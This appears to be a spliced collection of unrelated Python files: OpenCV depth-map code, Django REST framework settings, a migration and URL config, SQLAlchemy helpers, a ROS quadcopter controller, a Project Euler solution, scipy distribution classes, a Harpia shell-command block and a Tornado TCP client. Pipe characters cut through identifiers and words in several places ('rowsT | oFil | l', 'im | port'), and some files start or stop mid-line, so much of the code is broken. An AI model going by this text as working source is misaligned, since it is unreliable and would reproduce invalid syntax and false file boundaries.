# print(shift_value)
#
# left = np.rot90(left, 3)
# right = np.rot90(right, 3)
#
# cv2.imshow('left', left)
# cv2.imshow('right', right)
#
# shifted_map = cv2.equalizeHist(
# calculate_depth_map(
# left, right))
# cv2.imshow(
# 'shifted map', shifted_map)
# diff = cv2.absdiff(left, right)
# cv2.imshow('diff', diff)
# dm = calculate_depth_map(left, right)
# cv2.imshow('dm', dm)
# dm = cv2.equalizeHist(dm)
# cv2.imshow('eq dm', dm)
# dm = cv2.cvtColor(dm, cv2.COLOR_GRAY2BGR)
k = cv2.waitKey(1) & 0xff
if k == 27:
break
elif k == ord('s'):
cv2.imwrite('screen.png', img)
cap.release()
out.release()
cv2.destroyAllWindows()
video_test('../../video/6.mp4', '../results/depth_map_out.avi')
|
"""
Settings for REST framework are all namespaced in the REST_FRAMEWORK setting.
For example your project's `settings.py` file might look like this:
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.YAMLRenderer',
)
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.YAMLParser',
)
}
This module provides the `api_setting` object, that is used to access
REST framework settings, checking for user settings first, then falling
back to the defaults.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.utils import importlib
from rest_framework import ISO_8601
from rest_framework.compat import six
USER_SETTINGS = getattr(settings, 'REST_FRAMEWORK', None)
DEFAULTS = {
# Base API policies
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication'
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.AllowAny',
),
'DEFAULT_THROTTLE_CLASSES': (
),
'DEFAULT_CONTENT_NEGOTIATION_CLASS':
'rest_framework.negotiation.DefaultContentNegotiation',
# Genric view behavior
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.ModelSerializer',
'DEFAULT_PAGINATION_SERIALIZER_CLASS':
'rest_framework.pagination.PaginationSerializer',
'DEFAULT_FILTER_BACKENDS': (),
# Throttling
'DEFAULT_THROTTLE_RATES': {
'user': None,
'anon': None,
},
# Pagination
'PAGINATE_BY': None,
'PAGINATE_BY_PARAM': None,
'MAX_PAGINATE_BY': None,
# Authentication
'UNAUTHENTICATED_USER': 'django.contrib.auth.models.AnonymousUser',
'UNAUTHENTICATED_TOKEN': None,
# View configuration
'VIEW_NAME_FUNCTION': 'rest_framework.views.get_view_name',
'VIEW_DESCRIPTION_FUNCTION': 'rest_framework.views.get_view_description',
# Exception handling
'EXCEPTION_HANDLER': 'rest_framework.views.exception_handler',
# Testing
'TEST_REQUEST_RENDERER_CLASSES': (
'rest_framework.renderers.MultiPartRenderer',
'rest_framework.renderers.JSONRenderer'
),
'TEST_REQUEST_DEFAULT_FORMAT': 'multipart',
# Browser enhancements
'FORM_METHOD_OVERRIDE': '_method',
'FORM_CONTENT_OVERRIDE': '_content',
'FORM_CONTENTTYPE_OVERRIDE': '_content_type',
'URL_ACCEPT_OVERRIDE': 'accept',
'URL_FORMAT_OVERRIDE': 'format',
'FORMAT_SUFFIX_KWARG': 'format',
# Input and output formats
'DATE_INPUT_FORMATS': (
ISO_8601,
),
'DATE_FORMAT': None,
'DATETIME_INPUT_FORMATS': (
ISO_8601,
),
'DATETIME_FORMAT': None,
'TIME_INPUT_FORMATS': (
ISO_8601,
),
'TIME_FORMAT': None,
# Pending deprecation
'FILTER_BACKEND': None,
}
# List of settings that may be in string import notation.
IMPORT_STRINGS = (
'DEFAULT_RENDERER_CLASSES',
'DEFAULT_PARSER_CLASSES',
'DEFAULT_AUTHENTICATION_CLASSES',
'DEFAULT_PERMISSION_CLASSES',
'DEFAULT_THROTTLE_CLASSES',
'DEFAULT_CONTENT_NEGOTIATION_CLASS',
'DEFAULT_MODEL_SERIALIZER_CLASS',
'DEFAULT_PAGINATION_SERIALIZER_CLASS',
'DEFAULT_FILTER_BACKENDS',
'EXCEPTION_HANDLER',
'FILTER_BACKEND',
'TEST_REQUEST_RENDERER_CLASSES',
'UNAUTHENTICATED_USER',
'UNAUTHENTICATED_TOKEN',
'VIEW_NAME_FUNCTION',
'VIEW_DESCRIPTION_FUNCTION'
)
def perform_import(val, setting_name):
"""
If the given setting is a string import notation,
then perform the necessary import or imports.
"""
if isinstance(val, six.string_types):
return import_from_string(val, setting_name)
elif isinstance(val, (list, tuple)):
return [import_from_string(item, setting_name) for item in val]
return val
def import_from_string(val, setting_name):
"""
Attempt to import a class from a string representation.
"""
try:
# Nod to tastypie's use of importlib.
parts = val.split('.')
module_path, class_name = '.'.join(parts[:-1]), parts[-1]
module = importlib.import_module(module_path)
return getattr(module, class_name)
except ImportError as e:
msg = "Could not import '%s' for API setting '%s'. %s: %s." % (val, setting_name, e.__class__.__name__, e)
raise ImportError(msg)
class APISettings(object):
"""
A settings object, that allows API settings to be accessed as properties.
For example:
from rest_framework.settings import api_settings
print api_settings.DEFAULT_RENDERER_CLASSES
Any setting with string import paths will be automatically resolved
and return the class, rather than the string literal.
"""
def __init__(self, user_settings=None, defaults=None, import_strings=None):
self.user_settings = user_settings or {}
self.defaults = defaults or {}
self.import_strings = import_strings or ()
def __getattr__(self, attr):
if attr not in self.defaults.keys():
raise AttributeError("Invalid API setting: '%s'" % attr)
try:
# Check if present in user settings
val = self.user_settings[attr]
except KeyError:
# Fall back to defaults
val = self.defaults[attr]
# Coerce import strings into classes
if val and attr in self.import_strings:
val = perform_import(val, attr)
self.validate_setting(attr, val)
# Cache the result
setattr(self, attr, val)
return val
def validate_setting(self, attr, val):
if attr == 'FILTER_BACKEND' and val is not None:
# Make sure we c | an initialize the class
| val()
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRINGS)
|
# -*- coding: utf-8 -*-
# Generated by Django 1. | 10.5 on 2017-03-14 17:12
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('volunteers', '0001 | _initial'),
]
operations = [
migrations.RenameField(
model_name='volunteer',
old_name='picture',
new_name='avatar',
),
]
|
"""equinox_spring16_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import | include, url
from django.conf.urls.static import static
from django.contrib im | port admin
from rest_framework import routers
from equinox_api.views import ApplicationViewSet, OperationViewSet, InstancesViewSet, UserViewSet, ItemViewSet
from equinox_spring16_api import settings
router = routers.DefaultRouter()
router.register(r'applications', ApplicationViewSet)
router.register(r'operations', OperationViewSet)
router.register(r'instances', InstancesViewSet)
router.register(r'items', ItemViewSet)
router.register(r'users', UserViewSet)
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^', include(router.urls)),
url(r'^docs/', include('rest_framework_swagger.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
# -*- coding: utf-8 -*-
from __future__ | import unicode_literals
from privagal.core.utils import PrivagalTestCase
from ...gallery.factories import GalleryFactory, ImageFactory
class GalleryFactoryTestCase(PrivagalTestCase):
def test_images_given(self):
image = ImageFactory()
gallery = GalleryFactory(images__images=[image])
self.timeline.add_child(instance=gallery)
self.assertEqual | (gallery.images.first().image, image)
def test_images_default(self):
gallery = GalleryFactory()
self.assertEqual(gallery.images.count(), 3)
|
from sqlalchemy import and_
from DBtransfer import *
from zlib import *
#retrun compressed
def generateFromDB(DBSession, InternData, tmp_name) :
run_list=[]
user_data = DBSession.query(InternData).filter(InternData.timestamp == tmp_name)
for data in user_data :
if not data.run in run_list :
run_list.append(data.run)
return compressList(run_list)
def getknown_runsAndrun_list(DBSession, Mass_specData, InternData, tmp_name) : #CR: rename to splitKnownAndTodo
#~ knownRuns = [] # devide runs from upload into known runs (in DB) ...
#~ runList = [] #...and the usual run_list, to get data from these runs
#CR:
runs_in_upload = decompressList(generateFromDB(DBSession, InternData, tmp_name))
#~ known_runs = [x for x in DBSession.query(Mass_specData.filename).all() if x in runs_in_upload]
known_runs = [x.filename for x in DBSession.query(Mass_specData).filter(Mass_specData.filename.in_(runs_in_upload))]
run_list = [x for x in runs_in_upload if x not in known_runs]
#~ allRuns = getAllRuns_Filename(DBSession, Mass_specData)# in DB saved runs
#~ decomruns_in_upload = decompressList(runs_in_upload)
#~ for run in decomruns_in_upload :
#~ if run in allRuns :
#~ knownRuns.append(run)
#~ else :
#~ runList.append(run)
return (known_runs, run_list)
#input compressed
#output not compressed
def usedRuns(run_list, params) :
list_of_used_runs = []
runs = decompressList(run_list)
for i in range(0, len(runs)) :
if runs[i] in params :
list_of_used_runs.append(runs[i])
return list_of_used_runs
# input not compressed
# output InternData objects
def rowsT | oFil | l(DBSession, InternData, tmp_name, used_runs) :
users_rows = getUserRows(DBSession, InternData, tmp_name)
rows = []
for row in users_rows :
if row.run in used_runs :
rows.append(row)
return rows
#input compressed, not compressed
def throughOutUsedRuns(run_list, used_runs) : # not compressed
rl = decompressList(run_list)
for run in used_runs :
rl.pop(rl.index(run))
if len(rl) > 0 :
return compressList(rl)
else :
return []
#
def compressList(list) :
return compress('$$'.join(list))
#input compressed
def decompressList(run_list) :
return decompress(run_list).split('$$')
|
#!/usr/bin/env python
'''======================================================
Created by: D. Spencer Maughan
Last updated: May 2015
File name: IRIS_DF_Controller.py
Organization: RISC Lab, Utah State University
Notes:
======================================================'''
import roslib; roslib.load_manifest('risc_msgs')
import rospy
from math import *
import numpy as np
import time
#=======================#
# Messages Needed #
#=======================#
from risc_msgs.msg import *
from std_msgs.msg import Bool
from roscopter.msg import Status
#=====================#
# Gain Matrices #
#=====================#
K = np.matrix([[ 1.8, 0, 0, 1.4, 0, 0, 0],\
[ 0, 1.8, 0, 0, 1.4, 0, 0],\
[ 0, 0, 3, 0, 0, 5, 0],\
[ 0, 0, 0, 0, 0, 0,.5]])
#========================#
# Globals #
#========================#
nominal_thrust = 0 # thrust necessary to maintain hover given battery level
phi_scale = 3.053261127645355
phi_trim = 0.0#0.058941904209906
theta_scale = 3.815398742249453
theta_trim = 0.0#-0.091216767651723
ctrl_status = False
states = Cortex()
states.Obj = [States()]*1
traj = Trajectories()
traj.Obj = [Trajectory()]*1
euler_max = 45*np.pi/180
max_yaw_rate = .3490659 #in radians/sec
rate = 45 # Hz
image = 0
start_time = 0
#==================#
# Publishers #
#==================#
pub_ctrl = rospy.Publisher('/controls', Controls, queue_size = 1)
#========================#
# Get Cortex States #
#========================#
def GetStates(S):
global states
states = S
#=====================#
# Get Trajectory #
#=====================#
def GetTraj(S):
global traj
traj = S
#=========================#
# Get Battery Status #
#=========================#
def GetBatt(S):
global nominal_thrust
B = S.battery_remaining
# coefficients for fourth order fit
# determined 11 May 2015 by Spencer Maughan and Ishmaal Erekson
c0 = 0.491674747062374
c1 = -0.024809293286468
c2 = 0.000662710609466
c3 = -0.000008160593348
c4 = 0.000000033699651
nominal_thrust = c0+c1*B+c2*B**2+c3*B**3+c4*B**4
#============================#
# Get Controller Status #
#============================#
def GetStatus(S):
global ctrl_status
ctrl_status = S.data
#========================#
# Basic Controller #
#========================#
def Basic_Controller():
global states, euler_max, max_yaw_rate, pub_ctrl,K,traj
Ctrl = Controls()
Ctrl.Obj = [Control()]*1
Ctrl.header.stamp = states.header.stamp
g = 9.80665 # average value of earth's gravitational constant m/s^2
m = 1.282 # IRIS mass in kg
#===================================#
# Get State Trajectory Errors #
#===================================#
if states.Obj[0].visible:
X = np.asmatrix(np.zeros((7,1)))
X[0] = traj.Obj[0].x-states.Obj[0].x
X[1] = traj.Obj[0].y-states.Obj[0].y
X[2] = traj.Obj[0].z-states.Obj[0].z
X[3] = traj.Obj[0].xdot-states.Obj[0].u
X[4] = traj.Obj[0].ydot-states.Obj[0].v
X[5] = traj.Obj[0].zdot-states.Obj[0].w
X[6] = traj.Obj[0].psi-states.Obj[0].psi*np.pi/180
#============================================#
# Differential Flatness Control Input #
#============================================#
# LQR input
utilde = -K*X
# required input
u_r = np.asmatrix(np.zeros((4,1)))
u = utilde+u_r-np.matrix([[0],[0],[9.81],[0]])
#======= | ===========================#
# Rotate to Vehicle 1 Frame #
#==================================#
|
psi = states.Obj[0].psi*np.pi/180
rotZ = np.matrix([[cos(psi), sin(psi), 0],[-sin(psi), cos(psi), 0],[0, 0, 1]])
Cart = np.matrix([[1, 0, 0],[0, -1, 0],[0, 0, -1]])
u[:-1] = Cart*rotZ*u[:-1]
#===================================#
# Normalize given the Thrust #
#===================================#
T = sqrt(u[0:3].T*u[0:3])
u[:-1] = np.divide(u[:-1],-T)
#==================#
# Set Controls #
#==================#
# Controls for Ardrone
# -phi = right... +phi = left
# -theta = back... +theta = forward
# -psi = right... +psi = left
global phi_trim,theta_trim,phi_scale,theta_scale
phi_d = (asin(u[1,-1]))
theta_d = (-asin(u[0,-1]))
ctrl = Control()
ctrl.name = states.Obj[0].name
ctrl.phi = phi_trim + phi_scale*phi_d
ctrl.theta = theta_trim + theta_scale*theta_d
ctrl.psi = -u[3,-1]/max_yaw_rate
global nominal_thrust
T_d = nominal_thrust+(T-g)/g
ctrl.T = T_d
Ctrl.Obj[0] = ctrl
Ctrl.header = states.header
#rospy.loginfo("latency = %f",states.header.stamp.to_sec()-rospy.get_time())
pub_ctrl.publish(Ctrl)
#===================#
# Main #
#===================#
if __name__=='__main__':
import sys
rospy.init_node('IRIS_DF_Controller')
#=====================================#
# Set up Publish/Subscribe Loop #
#=====================================#
r = rospy.Rate(rate)
while not rospy.is_shutdown():
sub_cortex = rospy.Subscriber('/cortex_raw' , Cortex, GetStates, queue_size=1, buff_size=2**24)
sub_traj = rospy.Subscriber('/trajectory' , Trajectories, GetTraj, queue_size=1, buff_size=2**24)
sub_Batt = rospy.Subscriber('/apm/status' , Status, GetBatt)
sub_status = rospy.Subscriber('/controller_status' , Bool, GetStatus)
Basic_Controller()
r.sleep()
|
#!/usr/bin/env python
# coding=utf-8
# Python Script
#
# Copyleft © Manoel Vilela
#
#
from functools import reduce
"""
Digit fifth powers
Problem 30
Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits:
1634 = 1^4 + 6^4 + 3^4 + 4^4
8208 = 8^4 + 2^4 + 0^4 + 8^4
9474 = 9^4 + 4^4 + 7^4 + 4^4
As 1 = 14 is not a sum it is not included.
The sum of these numbers is 1634 + 8208 + 9474 = 19316.
Find the sum of all the numbers that can be written as the sum of fifth powers of their digits.
"""
""" Prova de um cara lá no fórum do PE sobre apenas ser necessário considerar números de 6 dígitos ou menos.
Proof that one need only consider numbers 6 digits or less:
If N has n digits, then 10^{n-1} <= N.
If N is the sum of the 5th powers of its | digits, N <= n*9^5. Thus, 10^{n-1} <= n*9^5.
We now show by induction that if n>=7, then 10^{n-6} > n.
1) Basis step (n=7): 10^{7-6} = 10 > 7.
2) Induction step: suppose 10^{n-6} > n for some n>=7. Show this true for n+1 too. Well,
10^{(n+1)-6} = 10*10^{n-6} > 10n > 2n > n+1
QED.
It follows that if n>=7, then
10^{n-1} = 10^{n-6}*10^5 > n * 10^5 > n*9^5.
Hence the only way we can have 10^{n-1} <= n*9^5 is for n<=6.
"""
# Aqui foi pura sorte.
# Inicialme | nte tentei pensar num limite para testes, seria o tamanho*9**5, mas não consegui deduzir o maior tamanho possível
# Desse jeito, fiz alguns testes e descobri que a ocorrência de números que poderiam ser escritos como a soma de potência(5)
# Era no tamanho intervalo de [4, 7)
from itertools import combinations_with_replacement as c; from string import digits as d
n = lambda num, digits: sorted(str(num)) == sorted(digits)
p = lambda comb: sum([int(n) ** 5 for n in comb])
print(sum(set(reduce(list.__add__, ([p(cb) for cb in c(d, x) if n(p(cb), cb)] for x in range(7)))))) |
re(c > 1.0, e1, np.nan)
mu2_if_c = e2 - mu**2
mu2 = np.where(c > 2.0, mu2_if_c, np.nan)
g1 = _lazywhere(
c > 3.0,
(c, e1, e2, e3, mu2_if_c),
lambda c, e1, e2, e3, mu2_if_c: (e3 - 3*e2*e1 + 2*e1**3) / np.sqrt((mu2_if_c)**3),
fillvalue=np.nan)
g2 = _lazywhere(
c > 4.0,
(c, e1, e2, e3, e4, mu2_if_c),
lambda c, e1, e2, e3, e4, mu2_if_c: (
((e4 - 4*e3*e1 + 6*e2*e1**2 - 3*e1**4) / mu2_if_c**2) - 3),
fillvalue=np.nan)
return mu, mu2, g1, g2
def _munp(self, n, c, d):
def __munp(n, c, d):
nc = 1. * n / c
return d * sc.beta(1.0 - nc, d + nc)
n, c, d = np.asarray(n), np.asarray(c), np.asarray(d)
return _lazywhere((c > n) & (n == n) & (d == d), (c, d, n),
lambda c, d, n: __munp(n, c, d),
np.nan)
burr = burr_gen(a=0.0, name='burr')
class burr12_gen(rv_continuous):
r"""A Burr (Type XII) continuous random variable.
%(before_notes)s
See Also
--------
fisk : a special case of either `burr` or `burr12` with ``d=1``
burr : Burr Type III distribution
Notes
-----
The probability density function for `burr` is:
.. math::
f(x, c, d) = c d x^{c-1} / (1 + x^c)^{d + 1}
for :math:`x >= 0` and :math:`c, d > 0`.
`burr12` takes ``c`` and ``d`` as shape parameters for :math:`c`
and :math:`d`.
This is the PDF corresponding to the twelfth CDF given in Burr's list;
specifically, it is equation (20) in Burr's paper [1]_.
%(after_notes)s
The Burr type 12 distribution is also sometimes referred to as
the Singh-Maddala distribution from NIST [2]_.
References
----------
.. [1] Burr, I. W. "Cumulative frequency functions", Annals of
Mathematical Statistics, 13(2), pp 215-232 (1942) | .
.. [2] https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/b12pdf.htm
.. [3] "Burr distribution",
https://en.wikipedia.org/wiki/Burr_distribution
%(example)s
"""
def _pdf(self, x, c, d):
# burr12.pdf(x, c, d) = c * d * x** | (c-1) * (1+x**(c))**(-d-1)
return np.exp(self._logpdf(x, c, d))
def _logpdf(self, x, c, d):
return np.log(c) + np.log(d) + sc.xlogy(c - 1, x) + sc.xlog1py(-d-1, x**c)
def _cdf(self, x, c, d):
return -sc.expm1(self._logsf(x, c, d))
def _logcdf(self, x, c, d):
return sc.log1p(-(1 + x**c)**(-d))
def _sf(self, x, c, d):
return np.exp(self._logsf(x, c, d))
def _logsf(self, x, c, d):
return sc.xlog1py(-d, x**c)
def _ppf(self, q, c, d):
# The following is an implementation of
# ((1 - q)**(-1.0/d) - 1)**(1.0/c)
# that does a better job handling small values of q.
return sc.expm1(-1/d * sc.log1p(-q))**(1/c)
def _munp(self, n, c, d):
nc = 1. * n / c
return d * sc.beta(1.0 + nc, d - nc)
burr12 = burr12_gen(a=0.0, name='burr12')
class fisk_gen(burr_gen):
r"""A Fisk continuous random variable.
The Fisk distribution is also known as the log-logistic distribution.
%(before_notes)s
Notes
-----
The probability density function for `fisk` is:
.. math::
f(x, c) = c x^{-c-1} (1 + x^{-c})^{-2}
for :math:`x >= 0` and :math:`c > 0`.
`fisk` takes ``c`` as a shape parameter for :math:`c`.
`fisk` is a special case of `burr` or `burr12` with ``d=1``.
%(after_notes)s
See Also
--------
burr
%(example)s
"""
def _pdf(self, x, c):
# fisk.pdf(x, c) = c * x**(-c-1) * (1 + x**(-c))**(-2)
return burr._pdf(x, c, 1.0)
def _cdf(self, x, c):
return burr._cdf(x, c, 1.0)
def _sf(self, x, c):
return burr._sf(x, c, 1.0)
def _logpdf(self, x, c):
# fisk.pdf(x, c) = c * x**(-c-1) * (1 + x**(-c))**(-2)
return burr._logpdf(x, c, 1.0)
def _logcdf(self, x, c):
return burr._logcdf(x, c, 1.0)
def _logsf(self, x, c):
return burr._logsf(x, c, 1.0)
def _ppf(self, x, c):
return burr._ppf(x, c, 1.0)
def _munp(self, n, c):
return burr._munp(n, c, 1.0)
def _stats(self, c):
return burr._stats(c, 1.0)
def _entropy(self, c):
return 2 - np.log(c)
fisk = fisk_gen(a=0.0, name='fisk')
# median = loc
class cauchy_gen(rv_continuous):
r"""A Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `cauchy` is
.. math::
f(x) = \frac{1}{\pi (1 + x^2)}
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# cauchy.pdf(x) = 1 / (pi * (1 + x**2))
return 1.0/np.pi/(1.0+x*x)
def _cdf(self, x):
return 0.5 + 1.0/np.pi*np.arctan(x)
def _ppf(self, q):
return np.tan(np.pi*q-np.pi/2.0)
def _sf(self, x):
return 0.5 - 1.0/np.pi*np.arctan(x)
def _isf(self, q):
return np.tan(np.pi/2.0-np.pi*q)
def _stats(self):
return np.nan, np.nan, np.nan, np.nan
def _entropy(self):
return np.log(4*np.pi)
def _fitstart(self, data, args=None):
# Initialize ML guesses using quartiles instead of moments.
p25, p50, p75 = np.percentile(data, [25, 50, 75])
return p50, (p75 - p25)/2
cauchy = cauchy_gen(name='cauchy')
class chi_gen(rv_continuous):
r"""A chi continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi` is:
.. math::
f(x, k) = \frac{1}{2^{k/2-1} \Gamma \left( k/2 \right)}
x^{k-1} \exp \left( -x^2/2 \right)
for :math:`x >= 0` and :math:`k > 0` (degrees of freedom, denoted ``df``
in the implementation). :math:`\Gamma` is the gamma function
(`scipy.special.gamma`).
Special cases of `chi` are:
- ``chi(1, loc, scale)`` is equivalent to `halfnorm`
- ``chi(2, 0, scale)`` is equivalent to `rayleigh`
- ``chi(3, 0, scale)`` is equivalent to `maxwell`
`chi` takes ``df`` as a shape parameter.
%(after_notes)s
%(example)s
"""
def _rvs(self, df):
sz, rndm = self._size, self._random_state
return np.sqrt(chi2.rvs(df, size=sz, random_state=rndm))
def _pdf(self, x, df):
# x**(df-1) * exp(-x**2/2)
# chi.pdf(x, df) = -------------------------
# 2**(df/2-1) * gamma(df/2)
return np.exp(self._logpdf(x, df))
def _logpdf(self, x, df):
l = np.log(2) - .5*np.log(2)*df - sc.gammaln(.5*df)
return l + sc.xlogy(df - 1., x) - .5*x**2
def _cdf(self, x, df):
return sc.gammainc(.5*df, .5*x**2)
def _ppf(self, q, df):
return np.sqrt(2*sc.gammaincinv(.5*df, q))
def _stats(self, df):
mu = np.sqrt(2)*sc.gamma(df/2.0+0.5)/sc.gamma(df/2.0)
mu2 = df - mu*mu
g1 = (2*mu**3.0 + mu*(1-2*df))/np.asarray(np.power(mu2, 1.5))
g2 = 2*df*(1.0-df)-6*mu**4 + 4*mu**2 * (2*df-1)
g2 /= np.asarray(mu2**2.0)
return mu, mu2, g1, g2
chi = chi_gen(a=0.0, name='chi')
## Chi-squared (gamma-distributed with loc=0 and scale=2 and shape=df/2)
class chi2_gen(rv_continuous):
r"""A chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi2` is:
.. math::
f(x, k) = \frac{1}{2^{k/2} \Gamma \left( k/2 \right)}
x^{k/2-1} \exp \left( -x/2 \right)
for :math:`x > 0` and :math:`k > 0` (degrees of freedom, denoted ``df``
in the implementation).
`chi2` takes ``df`` as a shape parameter.
%(after_notes)s
%(example)s
"""
def _rvs(self, df):
return self._random_state.chisquare(df, self._size)
def _pdf(self, x, df):
# chi2.pdf(x, df) = 1 / (2*gamma(df/2)) * (x/2)**(df/2-1) * exp(-x/2)
return np.exp(self._logpdf(x, df))
def _logpdf(self, x, df):
return sc.xlogy(df/2.-1, x) - x/2. - sc.gam |
# -*- coding: utf-8 -*-
# [HARPIA PROJECT]
#
#
# S2i - Intelligent Industrial Systems
# DAS - Automation and Systems Department
# UFSC - Federal University of Santa Catarina
# Copyright: 2006 - 2007 Luis Carlos Dill Junges (lcdjunges@yahoo.com.br), Clovis Peruchi Scotti (scotti@ieee.org),
# Guilherme Augusto Rutzen (rutzen@das.ufsc.br), Mathias Erdtmann (erdtmann@gmail.com) and S2i (www.s2i.das.ufsc.br)
# 2007 - 2009 Clovis Peruchi Scotti (scotti@ieee.org), S2i (www.s2i.das.ufsc.br)
#
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further information, check the COPYING file distributed with this software.
#
# ----------------------------------------------------------------------
import gtk
from harpia.GladeWindow import GladeWindow
from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR
# i18n
import os
from harpia.utils.XMLUtils import XMLParser
import gettext
_ = gettext.gettext
gettext.bindtextdomain(APP, DIR)
gettext.textdomain(APP)
# ----------------------------------------------------------------------
class Properties(GladeWindow, S2iCommonProperties):
# ----------------------------------------------------------------------
def __init__(self, PropertiesXML, S2iBlockProperties):
self.m_sDataDir = os.environ['HARPIA_DATA_DIR']
filename = self.m_sDataDir + 'glade/runCmd.ui'
self.m_oPropertiesXML = PropertiesXML
self.m_oS2iBlockProperties = S2iBlockProperties
widget_list = [
'Properties',
'cmdString',
'BackgroundColor',
'BorderColor',
'HelpView',
'enIsntZero'
]
handlers = [
'on_cancel_clicked',
'on_prop_confirm_clicked',
'on_BackColorButton_clicked',
'on_BorderColorButton_clicked'
]
top_window = 'Properties'
GladeWindow.__init__(self, filename, top_window, widget_list, handlers)
# load properties values
self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property")
for Property in self.block_properties:
if Property.name == "cmdString":
self.widgets['cmdString'].set_text(Property.value)
if Property.name == "enIsntZero":
self.widgets['enIsntZero'].set_active(Property.value == "True")
self.configure()
# load help text
# t_oS2iHelp = XMLParser(self.m_sDataDir + "help/runCmd" + _("_en.help"))
# t_oTextBuffer = gtk.TextBuffer()
# t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent())))
# self.widgets['HelpView'].set_buffer(t_oTextBuffer)
#----------------Help Text--------------------------------------
def getHelp(self):#adicionado help
return "Executa | uma chamada de sistema dependendo da avaliação binaria do pixel (0,0) da imagem de entrada."
# ----------------------------------------------------------------------
def __del__(self):
pass
# ----------------------------------------------------------------------
def on_prop_confirm_clicked(self, *args):
for Property in self.bl | ock_properties:
if Property.name == "cmdString":
Property.value = unicode(self.widgets['cmdString'].get_text())
if Property.name == "enIsntZero":
Property.value = unicode(self.widgets['enIsntZero'].get_active())
self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML)
self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor)
self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor)
self.widgets['Properties'].destroy()
# ----------------------------------------------------------------------
# propProperties = Properties()()
# propProperties.show( center=0 )
# ------------------------------------------------------------------------------
# Code generation
# ------------------------------------------------------------------------------
def generate(blockTemplate):
cmdString = 'echo no properties'
enIsntZero = False
for propIter in blockTemplate.properties:
if propIter[0] == 'cmdString':
cmdString = propIter[1]
if propIter[0] == 'enIsntZero':
enIsntZero = (propIter[1] == "True")
cmdString = cmdString.replace(r"'", r"\'")
cmdString = cmdString.replace(r'"', r'\"')
blockTemplate.imagesIO = \
'double block$$_double_i1;\n' + \
'double block$$_double_o1;\n'
blockTemplate.functionCall = '\nif('
if enIsntZero:
blockTemplate.functionCall += 'block$$_double_i1 > 0.0){\n'
else:
blockTemplate.functionCall += '1){\n'
blockTemplate.functionCall += 'char outPutStr[' + str(len(cmdString) + 30) + '];\n' + \
'snprintf(outPutStr,' + str(len(
cmdString) + 30) + ',"export HRP_DB=%f;' + cmdString + '",(float)block$$_double_i1);' + \
'system(outPutStr);}\n' + \
'block$$_double_o1 = block$$_double_i1;\n'
blockTemplate.dealloc = '//nothing to deallocate\n'
# ------------------------------------------------------------------------------
# Block Setup
# ------------------------------------------------------------------------------
def getBlock():
return {"Label": _("Run Command"),
"Path": {"Python": "runCmd",
"Glade": "glade/runCmd.ui",
"Xml": "xml/runCmd.xml"},
"Icon": "images/runCmd.png",
"Color": "200:200:60:150",
"InTypes": {0: "HRP_DOUBLE"},
"OutTypes": {0: "HRP_DOUBLE"},
"Description": _("Runs a shell command depending on the input value."),
"TreeGroup": _("Experimental")
}
|
#coding=utf-8
#-*- encoding: utf-8 -*-
import tornado.ioloop
import tornado.iostream
import socket
import struct
import NotifyTCPServer
def readPacketHeader():
stream.read_bytes(NotifyTCPServer.PACKET_HEADER_LEN, parsePacketHeader)
def parsePacketHeader(data):
sign,cmd,bodySize = struct.unpack('>2sHH', data)
print "Sign: %s, Command: %s, Size: %s" % (sign,cmd,bodySize)
command=cmd
stream.read_bytes(bodySize, parsePacketBody)
def parsePacketBody(data):
print "Data: %s" % str(data)
if | command == NotifyTCPServer.NOTIFY_COMMAND_PING:
send_ping(data)
readPacketHeader()
def | send_register(userKey):
send_packet(NotifyTCPServer.NOTIFY_COMMAND_REGISTER, userKey)
def send_ping(msg):
send_packet(NotifyTCPServer.NOTIFY_COMMAND_PING, msg)
def send_packet(cmd, msg):
data = bytes(msg)
stream.write(struct.pack(">2sHH", "NT", cmd, len(data)))
stream.write(data)
def send_request():
readPacketHeader()
send_register('591410cbf9614cbf9aaac4a871ddb466')
